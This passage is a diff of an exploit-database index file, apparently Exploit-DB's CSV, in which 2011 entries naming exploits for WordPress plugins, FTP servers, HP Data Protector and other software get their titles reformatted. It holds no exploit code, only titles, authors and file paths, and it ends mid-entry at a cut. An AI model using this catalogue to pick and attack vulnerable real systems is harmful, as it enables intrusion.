17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection Vulnerability",2011-06-28,hamt0ry,php,webapps,0 @@ -15146,11 +15146,11 @@ id,file,description,date,author,platform,type,port 17465,platforms/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection Vulnerabilities",2011-07-01,"SEC Consult",php,webapps,0 17466,platforms/php/webapps/17466.txt,"Ollance Member Login Script Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",php,webapps,0 17467,platforms/windows/remote/17467.rb,"HP OmniInet.exe Opcode 27 Buffer Overflow",2011-07-01,metasploit,windows,remote,5555 -17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 Remote Buffer Overflow + DEP Bypass",2011-07-02,"muts and dookie",windows,remote,5555 +17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow + DEP Bypass",2011-07-02,"muts and dookie",windows,remote,5555 17471,platforms/windows/dos/17471.py,"Donar Player 2.8.0 - Denial of Service Vulnerability",2011-07-03,X-h4ck,windows,dos,0 17472,platforms/asp/webapps/17472.txt,"DmxReady Catalog Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0 -17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0 +17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053)",2011-07-03,"Myo Soe",windows,dos,0 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0 @@ -15171,12 +15171,12 @@ id,file,description,date,author,platform,type,port 17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 .ORD File Buffer Overflow Vulnerability (MSF)",2011-07-05,"James Fitts",windows,local,0 17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection Vulnerability",2011-07-05,Bellatrix,asp,webapps,0 17495,platforms/php/webapps/17495.txt,"BbZL.PhP File Inclusion Exploit",2011-07-06,"Number 7",php,webapps,0 -17496,platforms/php/webapps/17496.txt,"Joomla 1.6.3 CSRF Exploit",2011-07-06,"Luis Santana",php,webapps,0 +17496,platforms/php/webapps/17496.txt,"Joomla 1.6.3 - CSRF Exploit",2011-07-06,"Luis Santana",php,webapps,0 17497,platforms/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 ASX Playlist File Handling Buffer Overflow Vulnerability",2011-07-06,LiquidWorm,windows,dos,0 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server Buffer Overflow Vulnerability (MSF)",2011-07-07,"James Fitts",windows,remote,0 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (MSF)",2011-07-07,"James Fitts",windows,local,0 17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection Vulnerability",2011-07-07,kaMtiEz,php,webapps,0 -17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U Dos/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 +17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U DoS/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0 @@ -15194,14 +15194,14 @@ id,file,description,date,author,platform,type,port 17520,platforms/windows/remote/17520.rb,"Mozilla Firefox ""nsTreeRange"" Dangling Pointer Vulnerability",2011-07-10,metasploit,windows,remote,0 17522,platforms/php/webapps/17522.txt,"Fire Soft Board <= 2.0.1 Persistent XSS Vulnerability (admin panel)",2011-07-12,"_jill for A-S",php,webapps,0 17523,platforms/php/webapps/17523.txt,"Tradingeye E-commerce Shopping Cart Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 -17524,platforms/php/webapps/17524.html,"Pandora FMS 3.2.1 - Cross Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 +17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 17525,platforms/php/webapps/17525.txt,"Xmap 1.2.11 Joomla Component Blind SQL Injection",2011-07-12,jdc,php,webapps,0 17527,platforms/windows/remote/17527.py,"Solar FTP 2.1.1 PASV Buffer Overflow PoC",2011-07-12,"Craig Freyman",windows,remote,0 17528,platforms/php/webapps/17528.txt,"LiteRadius <= 3.2 - Multiple Blind SQL Injection Vulnerabilities",2011-07-13,"Robert Cooper",php,webapps,0 17529,platforms/php/webapps/17529.txt,"TCExam <= 11.2.011 - Multiple SQL Injection Vulnerabilities",2011-07-13,LiquidWorm,php,webapps,0 17530,platforms/php/webapps/17530.txt,"SOBI2 2.9.3.2 Joomla! Component Blind SQL Injections",2011-07-14,jdc,php,webapps,0 -17531,platforms/php/webapps/17531.txt,"PG eLMS Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 -17532,platforms/php/webapps/17532.txt,"PG eLMS Pro vDEC_2007_01 Multiple Blind SQL Injection Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 +17531,platforms/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 +17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection Vulnerability",2011-07-14,Netrondoank,php,webapps,0 17535,platforms/multiple/remote/17535.rb,"Java RMI Server Insecure Default Configuration Java Code Execution",2011-07-15,metasploit,multiple,remote,0 17536,platforms/windows/remote/17536.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow",2011-07-16,metasploit,windows,remote,0 @@ -15218,7 +15218,7 @@ id,file,description,date,author,platform,type,port 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Stored XSS Vulnerability",2011-07-20,"Sense of Security",jsp,webapps,0 17553,platforms/php/webapps/17553.txt,"Appointment Booking Pro Joomla Component LFI Vulnerability",2011-07-20,"Don Tukulesto",php,webapps,0 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - CSRF Vulnerabilities",2011-07-21,Crazy_Hacker,php,webapps,0 -17555,platforms/php/webapps/17555.txt,"Vbulletin 4.0.x <= 4.1.3 - (messagegroupid) SQL Injection Vulnerability 0day",2011-07-21,fb1h2s,php,webapps,0 +17555,platforms/php/webapps/17555.txt,"Vbulletin 4.0.x <= 4.1.3 - (messagegroupid) SQL Injection Vulnerability (0day)",2011-07-21,fb1h2s,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability",2011-07-21,v3n0m,php,webapps,0 17557,platforms/windows/remote/17557.html,"Dell IT Assistant detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0 17559,platforms/linux/shellcode/17559.c,"Linux x86 egghunt shellcode",2011-07-21,"Ali Raheem",linux,shellcode,0 @@ -15233,7 +15233,7 @@ id,file,description,date,author,platform,type,port 17570,platforms/php/webapps/17570.txt,"Musicbox <= 3.7 - Multiple Vulnerabilites",2011-07-25,R@1D3N,php,webapps,0 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 Cross Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0 -17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 Remote Code Execution",2011-07-26,beford,php,webapps,0 +17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)",2011-07-26,Abysssec,windows,remote,0 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC",2011-07-27,"Narendra Shinde",cgi,webapps,0 @@ -15244,16 +15244,16 @@ id,file,description,date,author,platform,type,port 17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop Stack-Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 17583,platforms/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service Heap Corruption",2011-07-28,"n.runs AG",windows,dos,0 17584,platforms/php/webapps/17584.php,"cFTP <= 0.1 (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 -17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 Multiple XSS Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0 +17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple XSS Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0 17587,platforms/php/webapps/17587.txt,"Link Station Pro Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0 -17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= 4.27 - USER Command 0day Stack Buffer Overflow (MSF)",2011-07-31,mr_me,windows,remote,0 +17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (MSF) (0day)",2011-07-31,mr_me,windows,remote,0 17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 (register_form()) Multiple POST XSS Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0 17591,platforms/php/webapps/17591.txt,"Joomla Component (com_obSuggest) Local File Inclusion Vulnerability",2011-07-31,v3n0m,php,webapps,0 -17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 CSRF Vulnerability",2011-08-01,Xadpritox,php,webapps,0 +17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - CSRF Vulnerability",2011-08-01,Xadpritox,php,webapps,0 17593,platforms/php/webapps/17593.txt,"Zoneminder 1.24.3 - Remote File Inclusion Vulnerability",2011-08-01,iye,php,webapps,0 17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC Credential Information Disclosure",2011-08-01,metasploit,jsp,webapps,0 -17595,platforms/php/webapps/17595.txt,"MyBB MyTabs (plugin) 0day SQL injection vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 -17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 +17595,platforms/php/webapps/17595.txt,"MyBB MyTabs (plugin) - SQL Injection Vulnerability (0day)",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 +17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL Injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow Vulnerability (DEP BYPASS)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server DoS",2011-08-03,"Craig Freyman",windows,dos,0 17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0 @@ -15273,7 +15273,7 @@ id,file,description,date,author,platform,type,port 17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server DoS (Write command)",2011-08-05,"SecPod Research",windows,dos,0 17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal Vulnerability",2011-08-05,"SecPod Research",windows,remote,0 17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 -17626,platforms/windows/remote/17626.rb,"PXE exploit server",2011-08-05,metasploit,windows,remote,0 +17626,platforms/windows/remote/17626.rb,"PXE Exploit server",2011-08-05,metasploit,windows,remote,0 17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin <= 1.0.3 - SQL Injection Vulnerability",2011-08-06,"Miroslav Stampar",php,webapps,0 17628,platforms/php/webapps/17628.txt,"WordPress Media Library Categories plugin <= 1.0.6 - SQL Injection Vulnerability",2011-08-06,"Miroslav Stampar",php,webapps,0 17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 @@ -15290,13 +15290,13 @@ id,file,description,date,author,platform,type,port 17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0 17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0 17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0 -17644,platforms/php/webapps/17644.txt,"FCKeditor all version - Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0 +17644,platforms/php/webapps/17644.txt,"FCKeditor - Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0 17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux Version)",2011-08-10,SZ,linux,remote,0 17649,platforms/windows/remote/17649.py,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0 -17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free vulnerability",2011-08-10,metasploit,windows,remote,0 +17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free Vulnerability",2011-08-10,metasploit,windows,remote,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0 @@ -15369,7 +15369,7 @@ id,file,description,date,author,platform,type,port 17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro <= 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0 17734,platforms/php/webapps/17734.txt,"JCE Joomla Extension <= 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0 17735,platforms/windows/local/17735.pl,"yahoo! player 1.5 (.m3u) Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 -17736,platforms/php/webapps/17736.txt,"joomla simple file lister module <= 1.0 - Directory Traversal vulnerability",2011-08-28,evilsocket,php,webapps,0 +17736,platforms/php/webapps/17736.txt,"joomla simple file lister module <= 1.0 - Directory Traversal Vulnerability",2011-08-28,evilsocket,php,webapps,0 17737,platforms/php/webapps/17737.txt,"WordPress Facebook Promotions plugin <= 1.3.3 - SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17738,platforms/php/webapps/17738.txt,"WordPress Evarisk plugin <= 5.1.3.6 - SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17739,platforms/php/webapps/17739.txt,"WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 @@ -15408,7 +15408,7 @@ id,file,description,date,author,platform,type,port 17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass)",2011-09-05,blake,windows,local,0 -17781,platforms/windows/dos/17781.pl,"World Of Warcraft Local Stack Overflow Dos Exploit (chat-cache.txt)",2011-09-05,"BSOD Digital",windows,dos,0 +17781,platforms/windows/dos/17781.pl,"World Of Warcraft Local Stack Overflow DoS Exploit (chat-cache.txt)",2011-09-05,"BSOD Digital",windows,dos,0 17782,platforms/php/webapps/17782.txt,"Elite Gaming Ladders 3.6 - SQL Injection Vulnerability",2011-09-05,J.O,php,webapps,0 17783,platforms/windows/local/17783.pl,"ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit",2011-09-05,"C4SS!0 G0M3S",windows,local,0 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String DoS Exploit (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0 @@ -15418,14 +15418,14 @@ id,file,description,date,author,platform,type,port 17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin <= 3.2.5 - SQL Injection Vulnerability",2011-09-06,sherl0ck_,php,webapps,0 17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin <= 2.2 - SQL Injection Vulnerability",2011-09-06,"Miroslav Stampar",php,webapps,0 17791,platforms/php/webapps/17791.txt,"WordPress KNR Author List Widget plugin <= 2.0.0 - SQL Injection Vulnerability",2011-09-06,"Miroslav Stampar",php,webapps,0 -17792,platforms/php/webapps/17792.txt,"PlaySMS <= 0.9.5.2 - Remote File Inclusion Vulnerability",2011-09-06,NoGe,php,webapps,0 +17792,platforms/php/webapps/17792.txt,"PlaySms <= 0.9.5.2 - Remote File Inclusion Vulnerability",2011-09-06,NoGe,php,webapps,0 17793,platforms/php/webapps/17793.txt,"WordPress SCORM Cloud plugin <= 1.0.6.6 - SQL Injection Vulnerability",2011-09-07,"Miroslav Stampar",php,webapps,0 17794,platforms/php/webapps/17794.txt,"WordPress Eventify - Simple Events plugin <= 1.7.f SQL Injection Vulnerability",2011-09-07,"Miroslav Stampar",php,webapps,0 17795,platforms/windows/dos/17795.py,"Crush FTP 5 'APPE' command Remote JVM BSOD PoC Exploit",2011-09-07,"BSOD Digital",windows,dos,0 17796,platforms/windows/dos/17796.txt,"Windows Server 2008 R1 Local Denial of Service",2011-09-07,Randomdude,windows,dos,0 17797,platforms/php/webapps/17797.txt,"WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability",2011-09-08,"Miroslav Stampar",php,webapps,0 17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin <= 1.2.1 - SQL Injection Vulnerability",2011-09-08,"Miroslav Stampar",php,webapps,0 -17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 CSRF add admin Vulnerability",2011-09-08,"red virus",php,webapps,0 +17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - CSRF add admin Vulnerability",2011-09-08,"red virus",php,webapps,0 17801,platforms/php/webapps/17801.rb,"Wordpress 1 Flash Gallery Plugin Arbiraty File Upload Exploit (MSF)",2011-09-08,"Ben Schmidt",php,webapps,0 17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 17806,platforms/linux/dos/17806.txt,"Ubuntu <= 11.04 ftp client Local Buffer Overflow Crash PoC",2011-09-08,localh0t,linux,dos,0 @@ -15436,7 +15436,7 @@ id,file,description,date,author,platform,type,port 17811,platforms/php/webapps/17811.txt,"MYRE Real Estate Software Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17813,platforms/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17814,platforms/php/webapps/17814.txt,"Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability",2011-09-09,serk,php,webapps,0 -17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x Denial of Service PoC",2011-09-09,modpr0be,windows,dos,0 +17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service PoC",2011-09-09,modpr0be,windows,dos,0 17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability",2011-09-10,"Miroslav Stampar",php,webapps,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone (.zip) Buffer Overflow Exploit (0day)",2011-09-12,mr_me,windows,local,0 17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 Post Auth Local File Inclusion Vulnerability",2011-09-12,brain[pillow],php,webapps,0 @@ -15445,18 +15445,18 @@ id,file,description,date,author,platform,type,port 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 .pll Buffer Overflow Exploit",2011-09-12,"Iván García Ferreira",windows,local,0 17822,platforms/php/webapps/17822.txt,"PHP Support Tickets 2.2 - Code Execution",2011-09-12,brain[pillow],php,webapps,0 17823,platforms/php/webapps/17823.txt,"NetCat CMS Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 -17824,platforms/php/webapps/17824.txt,"Slaed CMS Code Exec Vulnerability",2011-09-12,brain[pillow],php,webapps,0 +17824,platforms/php/webapps/17824.txt,"Slaed CMS - Code Execution Vulnerability",2011-09-12,brain[pillow],php,webapps,0 17825,platforms/php/webapps/17825.txt,"AstroCMS Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI <= 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,metasploit,windows,remote,0 17828,platforms/php/webapps/17828.txt,"Wordpress Plugin Forum Server <= 1.7 - SQL Injection Vulnerability",2011-09-13,"Miroslav Stampar",php,webapps,0 17829,platforms/php/webapps/17829.txt,"dotProject 2.1.5 - SQL Injection Vulnerability",2011-09-13,sherl0ck_,php,webapps,0 17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 -17831,platforms/windows/dos/17831.txt,"MS WINS ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 +17831,platforms/windows/dos/17831.txt,"Microsoft WINS ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 17832,platforms/php/webapps/17832.txt,"Wordpress Plugin e-Commerce <= 3.8.6 - SQL Injection Vulnerability",2011-09-14,"Miroslav Stampar",php,webapps,0 17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone <= 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,metasploit,windows,local,0 17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT <= 2.11.0.2004 Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17836,platforms/windows/dos/17836.txt,"Equis MetaStock <= 11 Use After Free",2011-09-14,"Luigi Auriemma",windows,dos,0 -17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro <= 10.6.2425.1208 Multiple Vulnerabilites",2011-09-14,"Luigi Auriemma",windows,dos,0 +17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro <= 10.6.2425.1208 - Multiple Vulnerabilites",2011-09-14,"Luigi Auriemma",windows,dos,0 17838,platforms/windows/dos/17838.txt,"Cogent DataHub <= 7.1.1.63 Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 17839,platforms/windows/dos/17839.txt,"Cogent DataHub <= 7.1.1.63 Integer Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 17840,platforms/windows/webapps/17840.txt,"Cogent DataHub <= 7.1.1.63 Source Disclosure",2011-09-14,"Luigi Auriemma",windows,webapps,0 @@ -15485,8 +15485,8 @@ id,file,description,date,author,platform,type,port 17865,platforms/php/webapps/17865.txt,"Wordpress Disclosure Policy Plugin 1.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17866,platforms/php/webapps/17866.txt,"Wordpress Mailing List Plugin 1.3.2 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17867,platforms/php/webapps/17867.txt,"Wordpress Zingiri Web Shop Plugin 2.2.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17868,platforms/php/webapps/17868.txt,"Wordpress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17869,platforms/php/webapps/17869.txt,"Wordpress Relocate Upload Plugin 0.14 Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17868,platforms/php/webapps/17868.txt,"Wordpress Mini Mail Dashboard Widget Plugin 1.36 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17869,platforms/php/webapps/17869.txt,"Wordpress Relocate Upload Plugin 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command",2011-09-19,mr.pr0n,windows,remote,0 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence Multiple Vulnerabilities - SOS-11-010",2011-09-19,"Sense of Security",hardware,webapps,0 17872,platforms/php/webapps/17872.txt,"Multiple Wordpress Plugin timthumb.php Vulnerabilites",2011-09-19,"Ben Schmidt",php,webapps,0 @@ -15516,12 +15516,12 @@ id,file,description,date,author,platform,type,port 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 -17902,platforms/windows/local/17902.c,"Norman Security Suite 8 (nprosec.sys) Local Privilege Escalation 0day",2011-09-28,Xst3nZ,windows,local,0 +17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - (nprosec.sys) Local Privilege Escalation (0day)",2011-09-28,Xst3nZ,windows,local,0 17903,platforms/windows/dos/17903.txt,"NCSS <= 07.1.21 Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (MSF)",2011-09-29,otoy,windows,remote,0 17905,platforms/php/webapps/17905.txt,"Typo3 File Disclosure",2011-09-29,"Number 7",php,webapps,0 17906,platforms/php/webapps/17906.txt,"Wordpress Plugin Bannerize <= 2.8.7 - SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0 -17908,platforms/freebsd/dos/17908.sh,"FreeBSD UIPC socket heap overflow proof-of-concept",2011-09-30,"Shaun Colley",freebsd,dos,0 +17908,platforms/freebsd/dos/17908.sh,"FreeBSD UIPC socket heap Overflow proof-of-concept",2011-09-30,"Shaun Colley",freebsd,dos,0 17909,platforms/php/webapps/17909.txt,"MARINET CMS (room.php) <= Blind SQL Vulnerability",2011-09-30,"BHG Security Center",php,webapps,0 17911,platforms/php/webapps/17911.php,"Feed on Feeds <= 0.5 - Remote PHP Code Injection Exploit",2011-09-30,EgiX,php,webapps,0 17918,platforms/windows/dos/17918.txt,"Adobe Photoshop Elements 8.0 - Multiple Arbitrary Code Execution Vulnerabilities",2011-10-02,LiquidWorm,windows,dos,0 @@ -15555,7 +15555,7 @@ id,file,description,date,author,platform,type,port 17949,platforms/php/webapps/17949.rb,"myBB 1.6.4 Backdoor Exploit",2011-10-09,metasploit,php,webapps,0 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 -17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 